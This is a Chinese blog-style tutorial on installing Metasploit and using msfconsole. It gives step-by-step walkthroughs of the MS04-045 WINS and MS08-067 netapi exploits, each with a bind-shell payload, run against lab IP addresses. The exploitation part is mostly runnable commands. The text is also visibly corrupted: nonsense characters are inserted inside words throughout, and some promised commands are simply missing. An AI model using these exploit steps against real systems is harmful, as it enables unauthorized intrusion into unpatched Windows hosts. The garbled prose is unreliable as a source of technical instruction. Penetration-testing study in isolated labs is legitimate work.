一、搭建metasploit环境
Windows环境下安装
metasploit
安装时需要注意要关闭杀毒软件,如果安装有杀毒软件,会提示在metasploit的安装目录下检测到病毒或木马。
二、metasploit的使用
Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式。原来还提供一种WEB模式,目前已经不再支持。目前这三种模式各有优缺点,建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有磨山功能,还可以在console中执行一些其它的茄迟外部命令,如ping。
Windows下GUI启动方式,从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示:
其GUI模式启动后界面如图2所示:
Windows下console模式的启动方式与GUI方式类似,启动后界面如图3所示:
Metasploit的使用较为简单,了解其基本命令即可。下面以console的使用方式为例说明如何使用:
输入help或?可查看帮助信颤游李息。
下面以exploit中的ms04_045_wins为例进行说明。
1、show exploits,
2、info exploit/windows/wins/ms04_045_wins,查看其描述信息。
3、use exploit/windows/wins/ms04_045_wins,使用此exploit。
4、show options,查看相应的选项
5、set RHOST 192.168.1.200,设置目标
6、set RPORT 7777,设置端口
7、set PAYLOAD generic/shell_bind_tcp,设置使用的shellcode
8、exploit,执行攻击
安装过程会出现一个error,ruby的一个nokogiri包正常安装失败,解决命令:
然颂隐后就可以直接运行msf
你也可以这样拍迹运行:
已经测试msfvenom能顺利生成野贺厅payload
所以功能基本都有
时间:2022-03-10
一、环境准备
1、需要腊岁轿轮肆准备英文的windows xp 环境。
链接: https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g
提取码:y8mj
2、攻击工具使用的是metasploit,kali 自带。
二、雀好复现时存在的问题
1、安装完xp之后,我自己已经复现了一次,发现拿到的system没有相关命令,可能是这个新系统没有添加到环境中,之后建立了一个文档进行读取,也可直观的看到结果。其他就没遇到什么问题了。
三、复现演示
1、虚拟机准备一下xp,建立一个test的文档,查看一下靶机 IP,靶机建立完成
2、使用metasploit 进行攻击
1)、msfconsole #进入metasploit
2)、search ms08-067 #搜索相关exp
3)、use exploit/windows/smb/ms08_067_netapi #使用这个exp
4)、show payloads #搜索相关payload,能让攻击后建立连接
5)、set payload generic/shell_bind_tcp #我使用的是这个
6)、set RHOST 192.168.154.144 #设置靶机IP,让它攻击这个IP,端口默认是445,这个就不需要设置了
7)、show options #可以用这个命令查看是否把相关配置设置全了
8)、run 或 exploit #进行攻击,两个命令都可以
9)、type test.txt #之后攻击成功了,使用windows命令 就可以去相关路径下查看那个 test 文档了
演示图:
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)